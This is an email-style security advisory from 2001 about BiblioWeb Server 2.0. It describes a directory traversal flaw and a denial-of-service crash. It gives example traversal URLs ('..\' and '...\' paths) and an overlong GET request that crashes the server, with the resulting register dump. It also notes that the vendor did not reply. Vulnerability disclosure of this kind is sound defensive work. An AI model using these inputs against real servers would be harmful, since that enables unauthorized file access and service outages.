To Ben Greenbaum:
Please post this advisory instead of the last. I needed to
make a minor change to the 'Vendor Status' section. Thanks.
----------
Vulnerabilities in BiblioWeb Server
Overview
BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com. A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.
Details
To break out of the web root, use the following URLs:
http://localhost/..\[file outside web root]
http://localhost/...\[file outside web root]
To crash the server, telnet to port 80, and send:
GET /[a lot of 'A's]
The server crashes with the following dump:
BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
Registers:
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:
Solution
No quick fix is possible.
Vendor Status
CG Information was contacted via <[EMAIL PROTECTED]> on Monday,
January 29, 2001. No reply was received.
- Joe Testa ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron
)
